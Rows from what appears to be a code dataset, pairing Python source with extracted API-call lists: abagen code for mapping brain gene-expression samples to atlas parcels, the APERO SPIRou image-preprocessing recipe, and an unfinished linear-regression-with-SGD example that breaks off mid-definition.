    the right subcortex); see the `atlas_info` parameter description for more
information.
Matching of microarray samples to parcels in `atlas` is done via a multi-
step process:
1. Determine if the sample falls directly within a parcel,
2. Check to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. If there are multiple nearby parcels, the sample is assigned to the
closest parcel, as determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If multiple sample are assigned to the same parcel they are
aggregated with the metric specified via the `metric` parameter. More
control over the sample matching can be obtained by setting the `exact`
parameter; see the parameter description for more information.
Once all samples have been matched to parcels for all supplied donors, the
microarray expression data are normalized within-donor via a scaled robust
sigmoid (SRS) procedure before being combined across donors via the
supplied `metric`.
Parameters
----------
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : str or :class:`pandas.DataFrame`, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have at least columns 'id', 'hemisphere', and 'structure'
containing information mapping atlas IDs to hemisphere (i.e, "L", "R")
and broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
exact : bool, optional
Whether to use exact matching of donor tissue samples to parcels in
`atlas`. If True, this function will match tissue samples to parcels
within `threshold` mm of the sample; any samples that are beyond
`threshold` mm of a parcel will be discarded. This may result in some
parcels having no assigned sample / expression data. If False, the
default matching procedure will be performed and followed by a check
for parcels with no assigned samples; any such parcels will be matched
to the nearest sample (nearest defined as the sample with the closest
Euclidean distance to the parcel centroid). Default: True
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
metric : str or func, optional
Mechanism by which to collapse across donors, if input `files` provides
multiple donor datasets. If a str, should be in ['mean', 'median']; if
a function, should be able to accept an `N`-dimensional input and the
`axis` keyword argument and return an `N-1`-dimensional output.
Default: 'mean'
ibf_threshold : [0, 1] float, optional
        Threshold for intensity-based filtering, specifying the ratio of
        samples (across all supplied donors) for which a probe must have signal
        above background noise in order to be retained.
Default: 0.5
corrected_mni : bool, optional
Whether to use the "corrected" MNI coordinates shipped with the
`alleninf` package instead of the coordinates provided with the AHBA
data when matching tissue samples to anatomical regions. Default: True
reannotated : bool, optional
Whether to use reannotated probe information provided by [1]_ instead
of the default probe information from the AHBA dataset. Using
reannotated information will discard probes that could not be reliably
matched to genes. Default: True
return_counts : bool, optional
Whether to return how many samples were assigned to each parcel in
`atlas` for each donor. Default: False
return_donors : bool, optional
Whether to return donor-level expression arrays instead of aggregating
expression across donors with provided `metric`. Default: False
donors : list, optional
List of donors to use as sources of expression data. Can be either
donor numbers or UID. If not specified will use all available donors.
Default: 'all'
data_dir : str, optional
Directory where expression data should be downloaded (if it does not
already exist) / loaded. If not specified will use the current
directory. Default: None
Returns
-------
expression : (R, G) :class:`pandas.DataFrame`
Microarray expression for `R` regions in `atlas` for `G` genes,
aggregated across donors, where the index corresponds to the unique
integer IDs of `atlas` and the columns are gene names.
counts : (R, D) :class:`pandas.DataFrame`
Number of samples assigned to each of `R` regions in `atlas` for each
of `D` donors (if multiple donors were specified); only returned if
`return_counts=True`.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2019). A
practical guide to linking brain-wide gene expression and neuroimaging
data. NeuroImage, 189, 353-367.
.. [2] <NAME>. et al. (2012) An anatomically comprehensive atlas of
the adult human transcriptome. Nature, 489, 391-399.
"""
# fetch files
files = datasets.fetch_microarray(data_dir=data_dir, donors=donors)
for key in ['microarray', 'probes', 'annotation', 'pacall', 'ontology']:
if key not in files:
raise KeyError('Provided `files` dictionary is missing {}. '
'Please check inputs.'.format(key))
# load atlas_info, if provided
atlas = check_niimg_3d(atlas)
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get combination functions
metric = utils.check_metric(metric)
# get some info on the number of subjects, labels in `atlas_img`
num_subj = len(files.microarray)
all_labels = utils.get_unique_labels(atlas)
if not exact:
centroids = utils.get_centroids(atlas, labels=all_labels)
# reannotate probes based on updates from Arnatkeviciute et al., 2018 then
# perform intensity-based filter of probes and select probe with highest
# differential stability for each gene amongst remaining probes
if reannotated:
probes = process.reannotate_probes(files.probes[0])
else:
probes = io.read_probes(files.probes[0])
probes = process.filter_probes(files.pacall, probes,
threshold=ibf_threshold)
probes = process.get_stable_probes(files.microarray, files.annotation,
probes)
expression, missing = [], []
counts = pd.DataFrame(np.zeros((len(all_labels) + 1, num_subj)),
index=np.append([0], all_labels))
for subj in range(num_subj):
# get rid of samples whose coordinates don't match ontological profile
annotation = process.drop_mismatch_samples(files.annotation[subj],
files.ontology[subj],
corrected=corrected_mni)
# subset representative probes + samples from microarray data
microarray = io.read_microarray(files.microarray[subj])
samples = microarray.loc[probes.index, annotation.index].T
samples.columns = probes.gene_symbol
# assign samples to regions and aggregate samples w/i the same region
sample_labels = label_samples(annotation, atlas,
atlas_info=atlas_info,
tolerance=tolerance)
expression += [group_by_label(samples, sample_labels,
all_labels, metric=metric)]
# get counts of samples collapsed into each ROI
labs, num = np.unique(sample_labels, return_counts=True)
counts.loc[labs, subj] = num
# if we don't want to do exact matching then cache which parcels are
# missing data and the expression data for the closest sample to that
# parcel; we'll use this once we've iterated through all donors
if not exact:
coords = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']],
atlas.affine)
empty = ~np.in1d(all_labels, labs)
closest, dist = utils.closest_centroid(coords, centroids[empty],
return_dist=True)
closest = samples.loc[annotation.iloc[closest].index]
empty = all_labels[empty]
closest.index = pd.Series(empty, name='label')
missing += [(closest, dict(zip(empty, np.diag(dist))))]
# check for missing ROIs and fill in, as needed
if not exact:
# find labels that are missing across all donors
empty = reduce(set.intersection, [set(f.index) for f, d in missing])
for roi in empty:
# find donor with sample closest to centroid of empty parcel
ind = np.argmin([d.get(roi) for f, d in missing])
# assign expression data from that sample and add to count
expression[ind].loc[roi] = missing[ind][0].loc[roi]
counts.loc[roi, ind] += 1
# normalize data with SRS and aggregate across donors
expression = [process.normalize_expression(e) for e in expression]
if not return_donors:
expression = process.aggregate_donors(expression, metric)
if return_counts:
return expression, counts.iloc[1:]
return expression
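# --- Hedged illustration (not part of the library) ---------------------------
# The docstring above mentions that expression values are normalized within-donor
# via a scaled robust sigmoid (SRS) before aggregation. The sketch below shows the
# usual median/IQR-based formulation of that idea; the actual implementation in
# `process.normalize_expression` may differ in details (e.g. NaN handling or
# behaviour when the IQR is zero).
def _srs_normalize_sketch(values):
    """Scaled robust sigmoid: sigmoid of median/IQR-standardized values,
    rescaled to span the unit interval."""
    import numpy as np
    from scipy import stats
    values = np.asarray(values, dtype=float)
    med = np.median(values)
    iqr = stats.iqr(values)
    srs = 1.0 / (1.0 + np.exp(-(values - med) / iqr))
    # rescale so the normalized values lie in [0, 1]
    return (srs - srs.min()) / (srs.max() - srs.min())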
|
[
"abagen.utils.check_metric",
"abagen.utils.xyz_to_ijk",
"abagen.io.read_probes",
"abagen.process.drop_mismatch_samples",
"numpy.diag",
"numpy.unique",
"pandas.DataFrame",
"abagen.utils.closest_centroid",
"abagen.process.get_stable_probes",
"abagen.process.normalize_expression",
"nilearn._utils.check_niimg_3d",
"abagen.process.filter_probes",
"numpy.append",
"scipy.spatial.distance.cdist",
"abagen.utils.check_atlas_info",
"abagen.io.read_microarray",
"abagen.utils.get_unique_labels",
"abagen.utils.expand_roi",
"pandas.Series",
"abagen.io.read_annotation",
"numpy.all",
"abagen.process.aggregate_donors",
"abagen.utils.get_centroids",
"abagen.datasets.fetch_microarray",
"numpy.setdiff1d",
"numpy.where",
"abagen.process.reannotate_probes",
"numpy.in1d"
] |
[((1758, 1821), 'abagen.utils.expand_roi', 'utils.expand_roi', (['sample'], {'dilation': 'tolerance', 'return_array': '(True)'}), '(sample, dilation=tolerance, return_array=True)\n', (1774, 1821), False, 'from abagen import datasets, io, process, utils\n'), ((2095, 2135), 'numpy.unique', 'np.unique', (['nz_labels'], {'return_counts': '(True)'}), '(nz_labels, return_counts=True)\n', (2104, 2135), True, 'import numpy as np\n'), ((3186, 3220), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas', 'labels'], {}), '(atlas, labels)\n', (3205, 3220), False, 'from abagen import datasets, io, process, utils\n'), ((6448, 6478), 'abagen.io.read_annotation', 'io.read_annotation', (['annotation'], {}), '(annotation)\n', (6466, 6478), False, 'from abagen import datasets, io, process, utils\n'), ((6491, 6512), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (6505, 6512), False, 'from nilearn._utils import check_niimg_3d\n'), ((6777, 6842), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], affine)\n", (6793, 6842), False, 'from abagen import datasets, io, process, utils\n'), ((7563, 7652), 'pandas.DataFrame', 'pd.DataFrame', (['labelled_samples'], {'dtype': 'int', 'columns': "['label']", 'index': 'annotation.index'}), "(labelled_samples, dtype=int, columns=['label'], index=\n annotation.index)\n", (7575, 7652), True, 'import pandas as pd\n'), ((8760, 8786), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (8778, 8786), False, 'from abagen import datasets, io, process, utils\n'), ((16518, 16577), 'abagen.datasets.fetch_microarray', 'datasets.fetch_microarray', ([], {'data_dir': 'data_dir', 'donors': 'donors'}), '(data_dir=data_dir, donors=donors)\n', (16543, 16577), False, 'from abagen import datasets, io, process, utils\n'), ((16868, 16889), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (16882, 16889), False, 'from nilearn._utils import check_niimg_3d\n'), ((17030, 17056), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (17048, 17056), False, 'from abagen import datasets, io, process, utils\n'), ((17181, 17211), 'abagen.utils.get_unique_labels', 'utils.get_unique_labels', (['atlas'], {}), '(atlas)\n', (17204, 17211), False, 'from abagen import datasets, io, process, utils\n'), ((17673, 17741), 'abagen.process.filter_probes', 'process.filter_probes', (['files.pacall', 'probes'], {'threshold': 'ibf_threshold'}), '(files.pacall, probes, threshold=ibf_threshold)\n', (17694, 17741), False, 'from abagen import datasets, io, process, utils\n'), ((17790, 17859), 'abagen.process.get_stable_probes', 'process.get_stable_probes', (['files.microarray', 'files.annotation', 'probes'], {}), '(files.microarray, files.annotation, probes)\n', (17815, 17859), False, 'from abagen import datasets, io, process, utils\n'), ((3239, 3280), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['sample', 'centroids'], {}), '(sample, centroids)\n', (3261, 3280), False, 'from abagen import datasets, io, process, utils\n'), ((6657, 6698), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (6679, 6698), False, 'from abagen import datasets, io, process, utils\n'), ((7130, 7161), 'numpy.where', 'np.where', (['(labelled_samples == 0)'], {}), '(labelled_samples == 0)\n', (7138, 7161), True, 'import numpy as np\n'), ((8858, 
8893), 'numpy.setdiff1d', 'np.setdiff1d', (['labels', 'sample_labels'], {}), '(labels, sample_labels)\n', (8870, 8893), True, 'import numpy as np\n'), ((16942, 16983), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (16964, 16983), False, 'from abagen import datasets, io, process, utils\n'), ((17250, 17295), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas'], {'labels': 'all_labels'}), '(atlas, labels=all_labels)\n', (17269, 17295), False, 'from abagen import datasets, io, process, utils\n'), ((17558, 17600), 'abagen.process.reannotate_probes', 'process.reannotate_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17583, 17600), False, 'from abagen import datasets, io, process, utils\n'), ((17628, 17659), 'abagen.io.read_probes', 'io.read_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17642, 17659), False, 'from abagen import datasets, io, process, utils\n'), ((18195, 18299), 'abagen.process.drop_mismatch_samples', 'process.drop_mismatch_samples', (['files.annotation[subj]', 'files.ontology[subj]'], {'corrected': 'corrected_mni'}), '(files.annotation[subj], files.ontology[subj],\n corrected=corrected_mni)\n', (18224, 18299), False, 'from abagen import datasets, io, process, utils\n'), ((18490, 18532), 'abagen.io.read_microarray', 'io.read_microarray', (['files.microarray[subj]'], {}), '(files.microarray[subj])\n', (18508, 18532), False, 'from abagen import datasets, io, process, utils\n'), ((19106, 19150), 'numpy.unique', 'np.unique', (['sample_labels'], {'return_counts': '(True)'}), '(sample_labels, return_counts=True)\n', (19115, 19150), True, 'import numpy as np\n'), ((20609, 20640), 'abagen.process.normalize_expression', 'process.normalize_expression', (['e'], {}), '(e)\n', (20637, 20640), False, 'from abagen import datasets, io, process, utils\n'), ((20709, 20753), 'abagen.process.aggregate_donors', 'process.aggregate_donors', (['expression', 'metric'], {}), '(expression, metric)\n', (20733, 20753), False, 'from abagen import datasets, io, process, utils\n'), ((1553, 1574), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (1567, 1574), False, 'from nilearn._utils import check_niimg_3d\n'), ((4221, 4268), 'numpy.all', 'np.all', (['(sample_info.values == atlas_info.values)'], {}), '(sample_info.values == atlas_info.values)\n', (4227, 4268), True, 'import numpy as np\n'), ((18034, 18060), 'numpy.append', 'np.append', (['[0]', 'all_labels'], {}), '([0], all_labels)\n', (18043, 18060), True, 'import numpy as np\n'), ((19459, 19530), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'atlas.affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], atlas.affine)\n", (19475, 19530), False, 'from abagen import datasets, io, process, utils\n'), ((19644, 19710), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['coords', 'centroids[empty]'], {'return_dist': '(True)'}), '(coords, centroids[empty], return_dist=True)\n', (19666, 19710), False, 'from abagen import datasets, io, process, utils\n'), ((19894, 19924), 'pandas.Series', 'pd.Series', (['empty'], {'name': '"""label"""'}), "(empty, name='label')\n", (19903, 19924), True, 'import pandas as pd\n'), ((8988, 9020), 'pandas.Series', 'pd.Series', (['missing'], {'name': '"""label"""'}), "(missing, name='label')\n", (8997, 9020), True, 'import pandas as pd\n'), ((19590, 19615), 'numpy.in1d', 'np.in1d', (['all_labels', 'labs'], {}), '(all_labels, labs)\n', (19597, 
19615), True, 'import numpy as np\n'), ((1842, 1863), 'scipy.spatial.distance.cdist', 'cdist', (['sample', 'coords'], {}), '(sample, coords)\n', (1847, 1863), False, 'from scipy.spatial.distance import cdist\n'), ((19975, 19988), 'numpy.diag', 'np.diag', (['dist'], {}), '(dist)\n', (19982, 19988), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# CODE DESCRIPTION HERE
Created on 2019-03-05 16:38
@author: ncook
Version 0.0.1
"""
import numpy as np
import os
from apero import core
from apero import lang
from apero.core import constants
from apero.science import preprocessing as pp
from apero.io import drs_image
from apero.io import drs_fits
from apero.core.instruments.spirou import file_definitions
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'cal_preprocess_spirou.py'
__INSTRUMENT__ = 'SPIROU'
# Get constants
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# Get Logging function
WLOG = core.wlog
# Get the text types
TextEntry = lang.drs_text.TextEntry
# Raw prefix
RAW_PREFIX = file_definitions.raw_prefix
# =============================================================================
# Define functions
# =============================================================================
# All recipe code goes in _main
# Only change the following from here:
# 1) function calls (i.e. main(arg1, arg2, **kwargs)
# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)
# 3) config_main outputs value (i.e. None, pp, reduced)
# Everything else is controlled from recipe_definition
def main(directory=None, files=None, **kwargs):
"""
Main function for cal_preprocess_spirou.py
:param directory: string, the night name sub-directory
:param files: list of strings or string, the list of files to process
:param kwargs: any additional keywords
:type directory: str
:type files: list[str]
:keyword debug: int, debug level (0 for None)
:returns: dictionary of the local space
:rtype: dict
"""
# assign function calls (must add positional)
fkwargs = dict(directory=directory, files=files, **kwargs)
# ----------------------------------------------------------------------
# deal with command line inputs / function call inputs
recipe, params = core.setup(__NAME__, __INSTRUMENT__, fkwargs)
# solid debug mode option
if kwargs.get('DEBUG0000', False):
return recipe, params
# ----------------------------------------------------------------------
# run main bulk of code (catching all errors)
llmain, success = core.run(__main__, recipe, params)
# ----------------------------------------------------------------------
# End Message
# ----------------------------------------------------------------------
return core.end_main(params, llmain, recipe, success, outputs='None')
def __main__(recipe, params):
# ----------------------------------------------------------------------
# Main Code
# ----------------------------------------------------------------------
# Get hot pixels for corruption check
hotpixels = pp.get_hot_pixels(params)
    # get skip parameter
skip = params['SKIP_DONE_PP']
# ----------------------------------------------------------------------
# Loop around input files
# ----------------------------------------------------------------------
# get files
infiles = params['INPUTS']['FILES'][1]
# Number of files
num_files = len(params['INPUTS']['FILES'][1])
# storage for output files
output_names = []
# loop around number of files
for it in range(num_files):
# ------------------------------------------------------------------
# add level to recipe log
log1 = recipe.log.add_level(params, 'num', it)
# ------------------------------------------------------------------
# print file iteration progress
core.file_processing_update(params, it, num_files)
        # get this iteration's file
file_instance = infiles[it]
# ------------------------------------------------------------------
# Fix the spirou header
# ------------------------------------------------------------------
# certain keys may not be in some spirou files
file_instance = drs_fits.fix_header(params, recipe, file_instance)
# ------------------------------------------------------------------
# identification of file drs type
# ------------------------------------------------------------------
        # identify this iteration's file type
cond, infile = pp.drs_infile_id(params, recipe, file_instance)
# ------------------------------------------------------------------
# if it wasn't found skip this file, if it was print a message
if cond:
eargs = [infile.name]
WLOG(params, 'info', TextEntry('40-010-00001', args=eargs))
else:
eargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00002', args=eargs))
continue
# get data from file instance
image = np.array(infile.data)
# ------------------------------------------------------------------
# Get out file and check skip
# ------------------------------------------------------------------
# get the output drs file
oargs = [params, recipe, infile, recipe.outputs['PP_FILE'], RAW_PREFIX]
found, outfile = pp.drs_outfile_id(*oargs)
# construct out filename
outfile.construct_filename(params, infile=infile)
# if we didn't find the output file we should log this error
if not found:
eargs = [outfile.name]
WLOG(params, 'error', TextEntry('00-010-00003', args=eargs))
if skip:
if os.path.exists(outfile.filename):
wargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00012', args=wargs))
continue
# ----------------------------------------------------------------------
# Check for pixel shift and/or corrupted files
# ----------------------------------------------------------------------
# storage
snr_hotpix, rms_list = [], []
        # do this iteratively: if there is a shift we need to re-work out the QC
for iteration in range(2):
# get pass condition
cout = pp.test_for_corrupt_files(params, image, hotpixels)
snr_hotpix, rms_list = cout[0], cout[1]
shiftdx, shiftdy = cout[2], cout[3]
# use dx/dy to shift the image back to where the engineering flat
# is located
if shiftdx != 0 or shiftdy != 0:
# log process
wmsg = TextEntry('40-010-00013', args=[shiftdx, shiftdy])
WLOG(params, '', wmsg)
# shift image
image = np.roll(image, [shiftdy], axis=0)
image = np.roll(image, [shiftdx], axis=1)
# work out QC here
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=False)
# if passed break
if passed:
break
# ------------------------------------------------------------------
# Quality control to check for corrupt files
# ------------------------------------------------------------------
# re-calculate qc
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=True)
# update recipe log
log1.add_qc(params, qc_params, passed)
if not passed:
# end log here
log1.end(params)
# go to next iteration
continue
# ------------------------------------------------------------------
# correct image
# ------------------------------------------------------------------
# correct for the top and bottom reference pixels
WLOG(params, '', TextEntry('40-010-00003'))
image = pp.correct_top_bottom(params, image)
# correct by a median filter from the dark amplifiers
WLOG(params, '', TextEntry('40-010-00004'))
image = pp.median_filter_dark_amps(params, image)
# correct for the 1/f noise
WLOG(params, '', TextEntry('40-010-00005'))
image = pp.median_one_over_f_noise(params, image)
# ------------------------------------------------------------------
# calculate mid observation time
# ------------------------------------------------------------------
mout = drs_fits.get_mid_obs_time(params, infile.header)
mid_obs_time, mid_obs_method = mout
# ------------------------------------------------------------------
# rotate image
# ------------------------------------------------------------------
# rotation to match HARPS orientation (expected by DRS)
image = drs_image.rotate_image(image, params['RAW_TO_PP_ROTATION'])
# ------------------------------------------------------------------
# Save rotated image
# ------------------------------------------------------------------
# define header keys for output file
# copy keys from input file
outfile.copy_original_keys(infile)
# add version
outfile.add_hkey('KW_PPVERSION', value=params['DRS_VERSION'])
# add dates
outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])
outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])
# add process id
outfile.add_hkey('KW_PID', value=params['PID'])
# add input filename
outfile.add_hkey_1d('KW_INFILE1', values=[infile.basename],
dim1name='infile')
# add qc parameters
outfile.add_qckeys(qc_params)
# add dprtype
outfile.add_hkey('KW_DPRTYPE', value=outfile.name)
# add the shift that was used to correct the image
outfile.add_hkey('KW_PPSHIFTX', value=shiftdx)
outfile.add_hkey('KW_PPSHIFTY', value=shiftdy)
# add mid observation time
outfile.add_hkey('KW_MID_OBS_TIME', value=mid_obs_time.mjd)
outfile.add_hkey('KW_MID_OBSTIME_METHOD', value=mid_obs_method)
# ------------------------------------------------------------------
# copy data
outfile.data = image
# ------------------------------------------------------------------
# log that we are saving rotated image
wargs = [outfile.filename]
WLOG(params, '', TextEntry('40-010-00009', args=wargs))
# ------------------------------------------------------------------
        # write FITS image to file
outfile.write_file()
# add to output files (for indexing)
recipe.add_output_file(outfile)
# index this file
core.end_main(params, None, recipe, success=True, outputs='pp',
end=False)
# ------------------------------------------------------------------
# append to output storage in p
# ------------------------------------------------------------------
output_names.append(outfile.filename)
# ------------------------------------------------------------------
# update recipe log file
# ------------------------------------------------------------------
log1.end(params)
# ----------------------------------------------------------------------
# End of main code
# ----------------------------------------------------------------------
return core.return_locals(params, dict(locals()))
# =============================================================================
# Start of code
# =============================================================================
if __name__ == "__main__":
# run main with no arguments (get from command line - sys.argv)
ll = main()
# =============================================================================
# End of code
# =============================================================================
|
[
"apero.core.setup",
"apero.science.preprocessing.median_one_over_f_noise",
"apero.science.preprocessing.correct_top_bottom",
"apero.core.run",
"apero.science.preprocessing.quality_control",
"apero.science.preprocessing.get_hot_pixels",
"apero.io.drs_image.rotate_image",
"os.path.exists",
"apero.io.drs_fits.fix_header",
"apero.core.file_processing_update",
"apero.science.preprocessing.median_filter_dark_amps",
"numpy.roll",
"apero.science.preprocessing.drs_infile_id",
"apero.core.constants.load",
"apero.io.drs_fits.get_mid_obs_time",
"apero.science.preprocessing.test_for_corrupt_files",
"apero.science.preprocessing.drs_outfile_id",
"apero.core.end_main",
"numpy.array"
] |
[((686, 716), 'apero.core.constants.load', 'constants.load', (['__INSTRUMENT__'], {}), '(__INSTRUMENT__)\n', (700, 716), False, 'from apero.core import constants\n'), ((2269, 2314), 'apero.core.setup', 'core.setup', (['__NAME__', '__INSTRUMENT__', 'fkwargs'], {}), '(__NAME__, __INSTRUMENT__, fkwargs)\n', (2279, 2314), False, 'from apero import core\n'), ((2563, 2597), 'apero.core.run', 'core.run', (['__main__', 'recipe', 'params'], {}), '(__main__, recipe, params)\n', (2571, 2597), False, 'from apero import core\n'), ((2781, 2843), 'apero.core.end_main', 'core.end_main', (['params', 'llmain', 'recipe', 'success'], {'outputs': '"""None"""'}), "(params, llmain, recipe, success, outputs='None')\n", (2794, 2843), False, 'from apero import core\n'), ((3105, 3130), 'apero.science.preprocessing.get_hot_pixels', 'pp.get_hot_pixels', (['params'], {}), '(params)\n', (3122, 3130), True, 'from apero.science import preprocessing as pp\n'), ((3917, 3967), 'apero.core.file_processing_update', 'core.file_processing_update', (['params', 'it', 'num_files'], {}), '(params, it, num_files)\n', (3944, 3967), False, 'from apero import core\n'), ((4303, 4353), 'apero.io.drs_fits.fix_header', 'drs_fits.fix_header', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4322, 4353), False, 'from apero.io import drs_fits\n'), ((4618, 4665), 'apero.science.preprocessing.drs_infile_id', 'pp.drs_infile_id', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4634, 4665), True, 'from apero.science import preprocessing as pp\n'), ((5136, 5157), 'numpy.array', 'np.array', (['infile.data'], {}), '(infile.data)\n', (5144, 5157), True, 'import numpy as np\n'), ((5490, 5515), 'apero.science.preprocessing.drs_outfile_id', 'pp.drs_outfile_id', (['*oargs'], {}), '(*oargs)\n', (5507, 5515), True, 'from apero.science import preprocessing as pp\n'), ((7587, 7631), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(True)'}), '(params, *qargs, log=True)\n', (7605, 7631), True, 'from apero.science import preprocessing as pp\n'), ((8147, 8183), 'apero.science.preprocessing.correct_top_bottom', 'pp.correct_top_bottom', (['params', 'image'], {}), '(params, image)\n', (8168, 8183), True, 'from apero.science import preprocessing as pp\n'), ((8315, 8356), 'apero.science.preprocessing.median_filter_dark_amps', 'pp.median_filter_dark_amps', (['params', 'image'], {}), '(params, image)\n', (8341, 8356), True, 'from apero.science import preprocessing as pp\n'), ((8462, 8503), 'apero.science.preprocessing.median_one_over_f_noise', 'pp.median_one_over_f_noise', (['params', 'image'], {}), '(params, image)\n', (8488, 8503), True, 'from apero.science import preprocessing as pp\n'), ((8715, 8763), 'apero.io.drs_fits.get_mid_obs_time', 'drs_fits.get_mid_obs_time', (['params', 'infile.header'], {}), '(params, infile.header)\n', (8740, 8763), False, 'from apero.io import drs_fits\n'), ((9066, 9125), 'apero.io.drs_image.rotate_image', 'drs_image.rotate_image', (['image', "params['RAW_TO_PP_ROTATION']"], {}), "(image, params['RAW_TO_PP_ROTATION'])\n", (9088, 9125), False, 'from apero.io import drs_image\n'), ((11006, 11080), 'apero.core.end_main', 'core.end_main', (['params', 'None', 'recipe'], {'success': '(True)', 'outputs': '"""pp"""', 'end': '(False)'}), "(params, None, recipe, success=True, outputs='pp', end=False)\n", (11019, 11080), False, 'from apero import core\n'), ((5838, 5870), 'os.path.exists', 'os.path.exists', (['outfile.filename'], 
{}), '(outfile.filename)\n', (5852, 5870), False, 'import os\n'), ((6451, 6502), 'apero.science.preprocessing.test_for_corrupt_files', 'pp.test_for_corrupt_files', (['params', 'image', 'hotpixels'], {}), '(params, image, hotpixels)\n', (6476, 6502), True, 'from apero.science import preprocessing as pp\n'), ((7157, 7202), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(False)'}), '(params, *qargs, log=False)\n', (7175, 7202), True, 'from apero.science import preprocessing as pp\n'), ((6951, 6984), 'numpy.roll', 'np.roll', (['image', '[shiftdy]'], {'axis': '(0)'}), '(image, [shiftdy], axis=0)\n', (6958, 6984), True, 'import numpy as np\n'), ((7009, 7042), 'numpy.roll', 'np.roll', (['image', '[shiftdx]'], {'axis': '(1)'}), '(image, [shiftdx], axis=1)\n', (7016, 7042), True, 'import numpy as np\n')]
|
#%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model, metrics, preprocessing
from sklearn.model_selection import train_test_split
import itertools
import typing
class LinearRegression():
def __init__(self, n_features, optimiser):
np.random.seed(2)
self.w = np.random.randn(n_features)
self.b = np.random.randn()
self.optimiser = optimiser
def fit(self, X, y):
'''
Fit model to data
'''
losses = []
for epoch in range(self.optimiser.epochs):
y_pred = self.predict(X)
new_w, new_b = self.optimiser.step(self.w, self.b, X, y_pred, y)
self._update_params(new_w, new_b)
losses.append(LinearRegression.mse_loss(y_pred, y))
LinearRegression.plot_loss(losses)
print('Final cost:', losses[-1])
print('Weight values:', self.w)
print('Bias values:', self.b)
def predict(self, X):
'''
Calculate prediction
'''
y_pred = np.dot(X, self.w) + self.b
return y_pred
@staticmethod
def mse_loss(y_pred, y_true):
'''
Calculate mean squared error
'''
m = y_pred.size
errors = y_pred - y_true
mse = 1/m * np.dot(errors.T, errors)
return mse
@staticmethod
def plot_loss(losses):
'''
Plot losses
'''
plt.figure()
plt.ylabel('Cost')
plt.xlabel('Epoch')
plt.plot(losses)
plt.show()
def _update_params(self, w, b):
'''
Update parameters
'''
self.w = w
self.b = b
return w, b
def score(self, y_pred, y_true):
'''
Calculate R2 score
'''
u = np.dot((y_pred - y_true).T, (y_pred - y_true))
y_true_mean = np.full(y_true.shape, np.mean(y_true))
v = np.dot((y_true_mean - y_true).T, (y_true_mean - y_true))
R2 = 1 - u/v
return R2
class SGDOptimiser:
def __init__(self, alpha, epochs):
self.alpha = alpha
self.epochs = epochs
def _calc_deriv(self, X, y_pred, y_true):
'''
        Calculate the derivative of the mean squared error (loss) with respect to the parameters
'''
m = y_pred.size
errors = y_pred - y_true
        # sum over the sample axis so each feature keeps its own gradient component
        dLdw = 2/m * np.sum(X.T * errors, axis=1)
print('dLdw',dLdw)
dLdb = 2/m * np.sum(errors)
print('dLdb',dLdb)
return dLdw, dLdb
def step(self, w, b, X, y_pred, y_true):
'''
        Calculate updated parameters to decrease the mean squared error
'''
dLdw, dLdb = self._calc_deriv(X, y_pred, y_true)
new_w = w - self.alpha * dLdw
new_b = b - self.alpha * dLdb
return new_w, new_b
class DataLoader:
def __init__(self, X, y):
idx = np.random.permutation(X.shape[0])
self.X = X[idx]
self.y = y[idx]
def yield_data(self, n):
X_yield = self.X[0:n+1]
y_yield = self.y[0:n+1]
self.X = self.X[n+1:]
self.y = self.y[n+1:]
return X_yield, y_yield
def add_data(self, X_new, y_new):
